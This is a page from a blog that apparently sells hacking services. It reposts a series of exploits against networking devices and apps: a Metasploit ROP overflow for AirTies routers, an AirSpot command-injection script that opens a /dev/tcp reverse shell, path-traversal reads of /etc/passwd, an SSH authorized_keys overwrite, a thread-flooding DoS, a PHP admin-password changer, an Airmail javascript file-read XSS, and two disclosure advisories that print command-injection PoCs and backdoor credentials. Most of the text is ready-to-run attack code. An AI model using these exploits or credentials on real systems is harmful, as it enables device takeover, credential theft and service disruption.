Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863107163

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC
# Version: AirTies Modem Firmware 1.0.0.12
# Tested on: Windows 10 x64
# CVE : CVE-2019-6967
# Author : Ali Can Gönüllü

<html>
<form method="POST" name="formlogin" action="
http://192.168.2.1/cgi-bin/login" target="_top" id="uiPostForm">
       <input type="hidden" id="redirect" name="redirect">
       <input type="hidden" id="self" name="self">
       <input name="user" type="text" id="uiPostGetPage" value="admin"
size="">
       <input name="password" type="password" id="uiPostPassword" size="">
<input onclick="uiDologin();" name="gonder" type="submit"
class="buton_text" id="__ML_ok" value="TAMAM"
style="background-image:url(images/buton_bg2.gif); height:21px;
width:110px; border: 0pt  none">
      </form>
      </html>
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Airties login-cgi Buffer Overflow',
      'Description'    => %q{
        This module exploits a remote buffer overflow vulnerability on several Airties routers.
        The vulnerability exists in the handling of HTTP queries to the login cgi with long
        redirect parametres. The vulnerability doesn't require authentication. This module has
        been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.
        Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,
        Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
      },
      'Author'         =>
        [
          'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => ['linux'],
      'Arch'           => ARCH_MIPSBE,
      'References'     =>
        [
          ['EDB', '36577'],
          ['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory
          ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC
        ],
      'Targets'        =>
        [
          [ 'AirTies_Air5650v3TT_FW_1.0.2.0',
            {
              'Offset'         => 359,
              'LibcBase'       => 0x2aad1000,
              'RestoreReg'     => 0x0003FE20, # restore s-registers
              'System'         => 0x0003edff, # address of system-1
              'CalcSystem'     => 0x000111EC, # calculate the correct address of system
              'CallSystem'     => 0x00041C10, # call our system
              'PrepareSystem'  => 0x000215b8  # prepare $a0 for our system call
            }
          ]
        ],
      'DisclosureDate'  => 'Mar 31 2015',
      'DefaultTarget'   => 0))

      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')
  end

  def check
    begin
      res = send_request_cgi({
        'uri'     => '/cgi-bin/login',
        'method'  => 'GET'
      })

      if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Accessing the vulnerable URL...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
    end

    print_status("#{peer} - Exploiting...")
    execute_cmdstager(
      :flavour  => :echo,
      :linemax => 100
    )
  end

  def prepare_shellcode(cmd)
    shellcode = rand_text_alpha_upper(target['Offset'])                    # padding
    shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N")     # restore registers with controlled values

                 # 0003FE20                 lw      $ra, 0x48+var_4($sp)
                 # 0003FE24                 lw      $s7, 0x48+var_8($sp)
                 # 0003FE28                 lw      $s6, 0x48+var_C($sp)
                 # 0003FE2C                 lw      $s5, 0x48+var_10($sp)
                 # 0003FE30                 lw      $s4, 0x48+var_14($sp)
                 # 0003FE34                 lw      $s3, 0x48+var_18($sp)
                 # 0003FE38                 lw      $s2, 0x48+var_1C($sp)
                 # 0003FE3C                 lw      $s1, 0x48+var_20($sp)
                 # 0003FE40                 lw      $s0, 0x48+var_24($sp)
                 # 0003FE44                 jr      $ra
                 # 0003FE48                 addiu   $sp, 0x48

    shellcode << rand_text_alpha_upper(36)                                 # padding
    shellcode << [target['LibcBase'] + target['System']].pack('N')         # s0 - system address-1
    shellcode << rand_text_alpha_upper(16)                                 # unused registers $s1 - $s4
    shellcode << [target['LibcBase'] + target['CallSystem']].pack('N')     # $s5 - call system

                 # 00041C10                 move    $t9, $s0
                 # 00041C14                 jalr    $t9
                 # 00041C18                 nop

    shellcode << rand_text_alpha_upper(8)                                  # unused registers $s6 - $s7
    shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N')  # write sp to $a0 -> parametre for call to system

                 # 000215B8                 addiu   $a0, $sp, 0x20
                 # 000215BC                 lw      $ra, 0x1C($sp)
                 # 000215C0                 jr      $ra
                 # 000215C4                 addiu   $sp, 0x20

    shellcode << rand_text_alpha_upper(28)                                 # padding
    shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N')     # add 1 to s0 (calculate system address)

                 # 000111EC                 move    $t9, $s5
                 # 000111F0                 jalr    $t9
                 # 000111F4                 addiu   $s0, 1

    shellcode << cmd
  end

  def execute_command(cmd, opts)
    shellcode = prepare_shellcode(cmd)
    begin
      res = send_request_cgi({
        'method' => 'POST',
        'uri'     => '/cgi-bin/login',
        'encode_params' => false,
        'vars_post' => {
          'redirect' => shellcode,
          'user'     => rand_text_alpha(5),
          'password' => rand_text_alpha(8)
        }
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
HireHackking 
# Exploit Title: AirStar Airbnb Clone Script v1.0 - SQL Injection
# Date: 2017-09-11
# Exploit Author: 8bitsec
# Vendor Homepage: https://www.abservetech.com/
# Software Link: https://www.abservetech.com/airstar-airbnb-clone/
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-11

Product & Service Introduction:
===============================
AirStar Airbnb Clone Script

Technical Details & Description:
================================

Blind SQL injection on [room_id] parameter.

Proof of Concept (PoC):
=======================

http://localhost/[path]/airstar/hotel/roomsedit/detailedroom/6 AND 8995=8995?mem_count=1&check_in=&check_out=&search_city=Madurai,India&min_amt=10&max_amt=150&inout=0

Parameter: #1 (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause

==================
8bitsec - [https://twitter.com/_8bitsec]
HireHackking 
# Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267

from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def banner():
  airspanLogo = """ 
      ,-.
     / \  `.  __..-,O
    :   \ --''_..-'.'
    |    . .-' `. '.
    :     .     .`.'
     \     `.  /  ..
      \      `.   ' .
       `,       `.   \
      ,|,`.        `-.\
     '.||  ``-...__..-`
      |  | Airspan 
      |__| AirSpot 5410
      /||\ PWNED x_x
     //||\\
    // || \\
 __//__||__\\__
'--------------'Necrum Security Labs
                        
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m                                                 
                FOR EDUCATIONAL PURPOSE ONLY.   
  """
  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))

def pingWebInterface(RHOST, RPORT):
  url = 'https://{}:{}'.format(RHOST, RPORT)
  try:
    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
    if response.status_code != 200:
      print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
      exit()
    print('[INFO] Airspan device web interface seems reachable!')
  except:
    print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
    exit()


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
  try:
    print('[INFO] Executing reverse shell...')
    response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
    return
  except Exception as e:
      print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
      return False

def main():
  banner()
  args = parser.parse_args()
  pingWebInterface(args.RHOST, args.RPORT)
  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
  parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
  main()
HireHackking 
# AirOS NanoStation M2 v5.6-beta 
# Arbitrary File Download & Remote Command Execution
# Tested on: XM.v5.6-beta5.24359.141008.1753 - Build: 2435
#            Linux Awesome 2.6.32.63 #1 Wed Oct 8 17:54:30 EEST 2014 mips unknown
#
# Date: May 30, 2016
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>

# Valid credentials are required !.
# Most of devices run default factory user/passwd combination (ubnt:ubnt)

# Take a look at /usr/www/scr.cgi 
  <?
    include("lib/settings.inc");
    include("lib/system.inc");

    $filename = $fname + ".sh";
    $file = $fname + $status;
    
    header("Content-Type: application/force-download");
    header("Content-Disposition: attachment; filename=" + $filename);
      
    passthru("cat /tmp/persistent/$file");
    exit;


# Arbitrary File Download
# Poc:
  GET http://x.x.x.x/scr.cgi?fname=../../../../../etc/passwd%00&status=

  Raw Response: dWJudDpWdnB2Q3doY2NGdjZROjA6MDpBZG1pbmlzdHJhdG9yOi9ldGMvcGVyc2lzdGVudDovYmluL3NoCm1jdXNlcjohVnZERThDMkVCMTowOjA6Oi9ldGMvcGVyc2lzdGVudC9tY3VzZXI6L2Jpbi9zaAo=
  
  Base64 Decoded: ubnt:VvpvCwhccFv6Q:0:0:Administrator:/etc/persistent:/bin/sh
                  mcuser:!VvDE8C2EB1:0:0::/etc/persistent/mcuser:/bin/sh


# Remote Command Execution:
# Poc:

  GET http://x.x.x.x/scr.cgi?fname=rc.poststart.sh;cat%20/etc/hosts%00&status=

  Raw Response: MTI3LjAuMC4xCWxvY2FsaG9zdC5sb2NhbGRvbWFpbglsb2NhbGhvc3QK
  
  Base64 Decoded: 127.0.0.1	localhost.localdomain	localhost
HireHackking 
EDB-Note Source: https://hackerone.com/reports/73480

Vulnerability

It's possible to overwrite any file (and create new ones) on AirMax systems, because the "php2" (maybe because of a patch) don't verify the "filename" value of a POST request. It's possible to a unauthenticated user to exploit this vulnerability.
Example

Consider the following request:

POST https://192.168.1.20/login.cgi HTTP/1.1
Cookie: $Version=0; AIROS_SESSIONID=9192de9ba81691e3e4d869a7207ec80f; $Path=/; ui_language=en_US
Content-Type: multipart/form-data; boundary=---------------------------72971515916103336881230390860
Content-Length: 773
User-Agent: Jakarta Commons-HttpClient/3.1
Host: 192.168.1.20
Cookie: $Version=0; AIROS_SESSIONID=7597f7f30cec75e1faef8fb608fc43bb; $Path=/; ui_language=en_US

-----------------------------72971515916103336881230390860
Content-Disposition: form-data; name="keyfile"; filename="../../etc/dropbear/authorized_keys"
Content-Type: application/vnd.ms-publisher

{{Your Public Key HERE}}
-----------------------------72971515916103336881230390860--

The web server must filter the file name ../../etc/dropbear/authorized_keys to just authorized_keys or return a 404. But the AirMax just received the file, overwriting the original (creating if don't exist) in the process. In this case the attacker are uploading arbitrary public ssh keys, but it can be used to upload configurations, or "/etc/passwd"...
Consequences

It's possible to take control over any AirMax Product with simple forged http POST request, what it disastrous.


Reproducing

With a simple command:
curl -F "file=@.ssh/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k

Of course if the ssh is disabled you can overwrite /etc/passwd and/or /tmp/system.cfg.
HireHackking 
#!/usr/bin/python
#coding: utf-8

# ************************************************************************
# *                Author: Marcelo Vázquez (aka s4vitar)                 *
# *     AirMore 1.6.1 Remote Denial of Service (DoS) & System Freeze     *
# ************************************************************************

# Exploit Title: AirMore 1.6.1 Remote Denial of Service (DoS) & System Freeze
# Date: 2019-02-14
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Vendor Homepage: https://airmore.com/
# Software Link: https://airmore.com/download
# Version: <= AirMore 1.6.1
# Tested on: Android

import sys, requests, threading, signal

def handler(signum, frame):
        print '\nFinishing program...\n'
        sys.exit(0)

if len(sys.argv) != 3:
	print "\nUsage: python " + sys.argv[0] + " <ip_address> <port>\n"
	print "Example: python AirMore_dos.py 192.168.1.125 2333\n"
	sys.exit(0)

def startAttack(url):
	url_destination = url + '/?Key=PhoneRequestAuthorization'
	headers = {'Origin': url, 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'es-ES,es;q=0.9,en;q=0.8', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36', 'Content-Type': 'text/plain;charset=UTF-8', 'accept': 'text/plain', 'Referer': url, 'Connection': 'keep-alive'}

	r = requests.post(url_destination, headers=headers)

if __name__ == '__main__':

	signal.signal(signal.SIGINT, handler)
	url = 'http://' + sys.argv[1] + ':' + sys.argv[2]

	threads = []

	for i in xrange(0, 10000):
		t = threading.Thread(target=startAttack, args=(url,))
		threads.append(t)

	for x in threads:
		x.start()

	for x in threads:
		x.join()
HireHackking 
<?php
# Exploit Title: AirMaster 3000M multiple Vulnerabilities
# Date: 2017/08/12
# Exploit Author: Koorosh Ghorbani
# Author Homepage: http://8thbit.net/
# Vendor Homepage: http://mobinnet.ir/
# Software Version: V2.0.1B1044
# Web Server: GoAhead-Webs/2.5.0

define('isDebug',false);
define('specialCookie','Cookie: kz_userid=Administrator:1'); //Special Cookie which allow us to execute commands without authentication
function changePassword(){
	$pw = "1234"; //New Password
	$data = "admuser=Administrator&admpass=$pw&admConfirmPwd=$pw" ;
	$ch = curl_init('http://192.168.1.1/goform/setSysAdm');
	curl_setopt($ch,CURLOPT_HTTPHEADER,array(
		specialCookie,
		'Origin: http://192.168.1.1',
		'Content-Type: application/x-www-form-urlencoded',
	));
	curl_setopt($ch,CURLOPT_POST,1);
	curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
	curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
	$response = curl_exec($ch);
	if($response == "success"){
		echo "New Password is : $pw\r\n";
	}else{
		echo "Failed\r\n";
	}
	if (isDebug){
		echo $response;
	}
}
function executeCommand(){
	$data = "pingAddr=`cat /etc/passwd`";
	$ch = curl_init('http://192.168.1.1/goform/startPing');
	curl_setopt($ch,CURLOPT_HTTPHEADER,array(
		specialCookie,
		'Origin: http://192.168.1.1',
		'Content-Type: application/x-www-form-urlencoded',
		"X-Requested-With: XMLHttpRequest",
		"Referer: http://192.168.1.1/diagnosis_ping.asp"
	));
	curl_setopt($ch,CURLOPT_POST,1);
	curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
	curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
	$response = curl_exec($ch);
	echo $response; //ping: bad address 'admin:XGUaznXz1ncKw:0:0:Adminstrator:/:/bin/sh'
}
changePassword();
HireHackking 
Airmail is a popular email client on iOS and OS X.
I found a vulnerability in airmail of the latest version which could cause
a file:// xss and arbitrary file read.

Author: redrain, yu.hong@chaitin.com
Date: 2016-08-15
Version: 3.0.2 and earlier
Platform: OS X and iOS
Site: http://airmailapp.com/
Vendor: http://airmailapp.com/
Vendor Notified: 2016-08-15

Vulnerability:
There is a file:// xss in airmail version 3.0.2 and earlier.
The app can deal the URLscheme render with link detection, any user can
edit the email content in reply with the evil code with the TL;DR.

Airmail implements its user interface using an embedded version of WebKit,
furthermore Airmail on OS X will render any URI as a clickable HTML <a
href= link. An attacker can create a simple JavaScript URI (e.g.,
javascript:) which when clicked grants the attacker initial JavaScript
execution (XSS) in the context of the application DOM.


PoC:
javascript://www.baidu.com/research?%0Aprompt(1)

a

Arbitrary file read:

javascript://www.baidu.com/research?%0Afunction%20reqListener%20()%20%7B%0A%
20%20prompt(this.responseText)%3B%0A%7D%0Avar%20oReq%20%3D%
20new%20XMLHttpRequest()%3B%0AoReq.addEventListener(%
22load%22%2C%20reqListener)%3B%0AoReq.open(%22GET%22%2C%
20%22file%3A%2F%2F%2Fetc%2Fpasswd%22)%3B%0AoReq.send()%3B
HireHackking 
1. Advisory Information

Title: AirLive Multiple Products OS Command Injection
Advisory ID: CORE-2015-0012
Advisory URL: http://www.coresecurity.com/advisories/airlive-multiple-products-os-command-injection
Date published: 2015-07-06
Date of last update: 2015-07-06
Vendors contacted: AirLive
Release mode: User release


2. Vulnerability Information

Class: OS Command Injection [CWE-78], OS Command Injection [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2279, CVE-2014-8389



3. Vulnerability Description

AirLive MD-3025 [3], BU-3026 [4], BU-2015 [2], WL-2000CAM [5] and POE-200CAM [6] are IP cameras designed for professional surveillance and security applications. The built-in IR LEDs provide high quality nighttime monitoring.

These AirLive [1] devices are vulnerable to an OS Command Injection Vulnerability. In the case of the MD-3025, BU-3026 and BU-2015 cameras, the vulnerability lies in the cgi_test.cgi binary file. In the case of the WL-2000CAM and POE-200CAM cameras, the command injection can be performed using the vulnerable wireless_mft.cgi binary file.


4. Vulnerable Packages

AirLive BU-2015 with firmware 1.03.18 16.06.2014
AirLive BU-3026 with firmware 1.43 21.08.2014
AirLive MD-3025 with firmware 1.81 21.08.2014
AirLive WL-2000CAM with firmware LM.1.6.18 14.10.2011
AirLive POE-200CAM v2 with firmware LM.1.6.17.01
Other devices may be affected too, but they were not checked.


5. Vendor Information, Solutions and Workarounds

Core Security recommends to apply a WAF (Web Application Firewall) rule that would filter the vulnerable request (either the CGI file or the parameters where the injection is performed) in order to avoid exploitation.

Contact the vendor for further information.


6. Credits

These vulnerabilities were discovered and researched by Nahuel Riva from Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Security Advisories Team.


7. Technical Description / Proof of Concept Code

7.1. OS Command Injection in cgi_test.cgi when handling certain parameters

[CVE-2015-2279] There is an OS Command Injection in the cgi_test.cgi binary file in the AirLive MD-3025, BU-3026 and BU-2015 cameras when handling certain parameters. That specific CGI file can be requested without authentication, unless the user specified in the configuration of the camera that every communication should be performed over HTTPS (not enabled by default).

The vulnerable parameters are the following:

 
write_mac
write_pid
write_msn
write_tan
write_hdv
These parameters are used to invoke another binary file called "info_writer".

In the sub_93F4 function it uses the "QUERY_STRING" and checks if it contains any of the parameters followed by an ampersand symbol:

 
sub_93F4
STMFD           SP!, {R4-R7,LR}
LDR             R0, =aQuery_string ; "QUERY_STRING"
SUB             SP, SP, #4
BL              getenv
MOV             R1, #0  ; c
MOV             R2, #0x12 ; n
MOV             R6, R0
LDR             R0, =unk_14B70 ; s
BL              memset
LDR             R0, =aContentTypeTex ; "Content-type: text/html\n\n<body>"
BL              printf
MOV             R5, #0
LDR             R7, =off_B7D0
MOV             R4, R5
B               loc_943C
[...]
loc_9540                ; jumptable 00009470 case 7
MOV             R0, R6
LDR             R1, =aWrite_pid ; "write_pid&"
BL              strstr
CMP             R0, #0
BEQ             loc_94CC ; jumptable 00009470 default case
[...]
 
It then uses whatever appears after the ampersand symbol in a call to printf() in order to put together the parameter with which the "info_writer" binary will be invoked. Finally, it calls the system() function:

 
[...]
.text:00009730 loc_9730                                ; CODE XREF: .text:00009714j
.text:00009730                 MOV             R2, R5
.text:00009734                 LDR             R1, =aOptIpncInfo__1 ; "/opt/ipnc/info_writer -p %s > /dev/null"
.text:00009738                 MOV             R0, SP
.text:0000973C                 BL              sprintf
.text:00009740                 MOV             R0, SP
.text:00009744                 BL              system
.text:00009748                 MOV             R2, R5
.text:0000974C                 LDR             R1, =aWrite_pidOkPid ; "WRITE_PID OK, PID=%s\r\n"
.text:00009750                 LDR             R0, =unk_1977C
.text:00009754                 MOV             R4, SP
.text:00009758                 BL              sprintf
.text:0000975C                 B               loc_9728
[...]
 
Consequently, if a semicolon (;) is used after the ampersand symbol, arbitrary commands can be injected into the operating system.

It's important to take into account that depending on the parameter used, there are checks like this (corresponding to the write_pid parameter):

 
.text:00009708                 MOV             R0, R5
.text:0000970C                 BL              strlen
.text:00009710                 CMP             R0, #9
 
This verifies that the parameter has a specific length. Because of this, the injection is somewhat limited. Nevertheless, there are possible commands that can be executed, for example:

 
Proof of Concept:

http://<Camera-IP>:8080/cgi_test.cgi?write_tan&;ls&ls%20-la


PoC Output:

Write MAC address, model name, hw version, sn, tan, pid,firmware version
 
  -c => set system MAC address
  -m [MAC] => write MAC address
  -n [Model Name] => write Model Name
  -h [HW Version] => write HW Version
  -v [Firmware Version] => write Firmware Version
  -s [SN] => write SN
  -t [TAN] => write TAN
  -d [PID] => write PID
  -r [CR] => write Country Region
  -p => show current info.
 
Content-type: text/html
 
<body>WRITE_TAN OK, PID=;ls&ls%20-
</body></html>3g.htm
485.htm
SStreamVideo.cab
ado.htm
cfgupgrade.cgi
cgi_test.cgi
client.htm
default.htm
default_else.htm
default_ie.htm
default_m.htm
default_nets.htm
[...]
 
7.2. OS Command Injection in AirLive WL-2000CAM's wireless_mft.cgi binary file

[CVE-2014-8389] The AirLive WL-2000CAM anf POE-200CAM "/cgi-bin/mft/wireless_mft.cgi" binary file, has an OS command injection in the parameter ap that can be exploited using the hard-coded credentials the embedded Boa web server has inside its configuration file:

 
username: manufacture
password: erutcafunam
 
The following proof of concept copies the file where the user credentials are stored in the web server root directory:

 
  <a href="http://<Camera-IP>/cgi-bin/mft/wireless_mft?ap=testname;cp%20/var/www/secret.passwd%20/web/html/credentials">http://<Camera-IP>/cgi-bin/mft/wireless_mft?ap=testname;cp%20/var/www/...</a>
   
Afterwards, the user credentials can be obtained by requesting:

 
<a href="http://<Camera-IP>/credentials">http://<Camera-IP>/credentials</a>
 
The credentials are encoded in a string using Base64, therefore it is easy to decode them and have complete access to the device.



8. Report Timeline

2015-05-04: Core Security sent an initial email notification to AirLive. Publication date set to Jun 8, 2015.
2015-05-07: Core Security sent another email notification to AirLive.
2015-05-14: Core Security attempted to contact AirLive through Twitter.
2015-05-20: Core Security attempted to contact AirLive through Twitter again.
2015-06-16: Core Security sent another email and Twitter notification to AirLive.
2015-06-18: Core Security sent an email to Airlive explaining that this was their last opportunity to reply, if not the advisory was going to be published on June 23, 2015.
2015-07-06: Advisory CORE-2015-0012 published.


9. References

[1] http://www.airlive.com. 
[2] http://www.airlive.com/product/BU-2015. 
[3] http://www.airlive.com/product/MD-3025. 
[4] http://www.airlive.com/product/BU-3026. 
[5] http://www.airlivecam.eu/manualy/ip_kamery/WL-2000CAM.pdf. 
[6] http://www.airlivesecurity.com/product.php?id=5#. 


10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.


11. About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.


12. Disclaimer

The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
HireHackking 
1. Advisory Information

Title: AirLink101 SkyIPCam1620W OS Command Injection
Advisory ID: CORE-2015-0011
Advisory URL: http://www.coresecurity.com/advisories/airlink101-skyipcam1620w-os-command-injection
Date published: 2015-07-08
Date of last update: 2015-07-08
Vendors contacted: AirLink101
Release mode: User release


2. Vulnerability Information

Class: OS Command Injection [CWE-78], Use of Hard-coded Credentials" [CWE-798]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2280



3. Vulnerability Description

AirLink101 [2] SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera streams supreme quality MPEG4 and MJPEG image. It supports remote surveillance on computers over the Internet or on mobile handheld devices.

The SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera [1] is vulnerable to an OS Command Injection Vulnerability in the snwrite.cgi binary.


4. Vulnerable Packages

AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP Network Camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck (Aug. 2012)
Other devices based on the same firmware are probably affected too, but they were not tested.


5. Vendor Information, Solutions and Workarounds

Core Security recommends applying a WAF (Web Application Firewall) rule that would filter the vulnerable request (either the CGI file or the parameters where the injection is performed) in order to avoid exploitation.

Contact the vendor for further information.


6. Credits

This vulnerability was discovered and researched by Nahuel Riva from the Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from the Core Security Advisories Team.



7. Technical Description / Proof of Concept Code

7.1. OS Command Injection in CGI binary file

[CVE-2015-2280] The snwrite.cgi binary has an OS Command Injection at function loc_8928 when handling the "mac" parameter:

 
.text:00008928
.text:00008928 loc_8928
.text:00008928 BL memset
.text:0000892C LDR R3, [R7,#0x40]
.text:00008930 LDR R2, =stderr
.text:00008934 ADD R3, R5, R3
.text:00008938 LDR R0, [R2] ; stream
.text:0000893C LDR R1, =aMacS ; "mac = %s"
.text:00008940 LDR R2, [R3,#0x104]
.text:00008944 BL fprintf
.text:00008948 LDR R2, [R7,#0x40]
.text:0000894C ADD R2, R5, R2
.text:00008950 LDR R3, [R2,#0x104]
.text:00008954 MOV R1, #0x80 ; maxlen
.text:00008958 LDR R2, =aEtcInit_dMacwr ; "/etc/init.d/macwrite.sh %s 1>/dev/null "...
.text:0000895C MOV R0, R8 ; s
.text:00008960 BL snprintf
.text:00008964 MOV R0, R8 ; command
.text:00008968 BL system
.text:0000896C LDR R4, [R7,#0x40]
.text:00008970 B loc_8908
.text:00008970 ; End of function sub_88A8
.text:00008970
The "mac" parameter is used in a printf() call to build a command to execute the macwrite.sh shell script to update the MAC Address configuration. The printf() built string is then used in a system() call. Therefore, it is possible to inject arbitrary commands just by putting a ";" after the "mac" parameter, for example:

 
http://<Camera_IP>/maker/snwrite.cgi?mac=1234;ps
 
In order to invoke the snwrite.cgi binary valid credentials are required, but a backdoor account located in /server/usr.ini can be used:

 
nriva@fastix:/mnt/firmware/server$ cat usr.ini

admin=Basic YWRtaW46YWRtaW4=
maker=Basic cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl
 
These accounts are encoded in base64 so it is relatively easy to recover them:

 
 >>> "YWRtaW46YWRtaW4=".decode("base64")
'admin:admin'

>>> "cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl".decode("base64")
'productmaker:ftvsbannedcode'
 
Using the 'productmaker:ftvsbannedcode' backdoor account allows access to the path /maker/snwrite.cgi and therefore the ability to perform the injection explained above.



8. Report Timeline

2015-05-04: Core Security sent an initial email notification to AirLink101. Publication date set to June 8, 2015.
2015-05-07: Core Security sent another email notification to AirLink101.
2015-05-14: Core Security attempted to contact AirLink101 through Twitter.
2015-05-14: Core Security sent yet another email notification to AirLink101.
2015-05-14: AirLink101 replied with a direct Twitter message asking Core to resend the email.
2015-05-14: Core Security informed AirLink101 through Twitter that they resent the email.
2015-05-15: Core Security asked AirLink101 through Twitter if they were able to find the email they sent.
2015-05-18: Core Security again asked AirLink101 through Twitter if they received the email.
2015-05-19: AirLink101 replied to Core on Twitter saying that they received the email and were reviewing the situation.
2015-05-20: Core Security replied AirLink101 with a direct Twitter message stating that they needed their reply soon in order to coordinate the advisory publication.
2015-05-21: AirLink101 wrote an email requesting that Core share the model and the issue they found, and requesting a contact phone number.
2015-05-22: Core Security replied to AirLink101 by email and asked if they had a PGP key or if they preferred the report to be sent in plain text. Additionally, Core informed AirLink101 that it is their policy to communicate exclusively via email in order to keep a record.
